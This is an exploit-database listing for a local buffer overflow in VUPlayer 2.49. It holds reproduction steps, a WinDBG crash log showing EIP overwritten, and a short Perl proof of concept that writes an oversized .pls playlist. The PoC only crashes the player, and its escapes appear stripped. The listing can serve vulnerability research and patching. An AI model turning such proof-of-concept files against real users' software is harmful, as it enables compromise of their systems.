[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

VUPlayer 2.49 - (.pls) Buffer Overflow Vulnerability

Author
ZwX
Risk
[
Security Risk High
]
0day-ID
0day-ID-25355
Category
local exploits
Date add
05-10-2016
Platform
windows
Technical Details & Description:
================================
The classic buffer overflow vulnerability is located in the software VUPlayer an attacker can manipulate the bit EIP register in 
order to execute the next instruction of their choice. Attackers are able to for example execute arbitrary codes. The attacker 
includes a large unicode string to overwrite the EIP register of the process. Finally the attacker is able to compromise the 
system process of the active program.


Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Launch VUPlayer.exe                
2. Run the code in perl and a file format (.pls) will create
3. Click File - Open a playlist 
4. Select the file (.pls)
5. Software will crash with Access violation
6. Successful reproduce of the local buffer overflow vulnerability!


--- Debug Session Logs [WinDBG] ---
Access violation - code c0000005
eax=00000000 ebx=0316e6c4 ecx=41414141 edx=00000000 esi=01670044 edi=0014efa8
eip=41414141 esp=0014ec3c ebp=41414141 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
41414141 ??              ???

Note: EIP, EBP & ECX overwritten


PoC : Perl  Exploit (*.pl)
#!/usr/bin/perl
my $Buff = "x41" x 1200;
open(MYFILE,'>>File.pls');
print MYFILE $Buff;
close(MYFILE);
print " POC Created by ZwXn";


Domain:     www.zwx.fr
Contact:    msk4@live.fr	
Social:     twitter.com/XSSed.fr
Feeds:      www.zwx.fr/feed/
Advisory:   www.vulnerability-lab.com/show.php?user=ZwX
            packetstormsecurity.com/files/author/12026/
            cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
            0day.today/author/27461

#  0day.today [2024-11-15]  #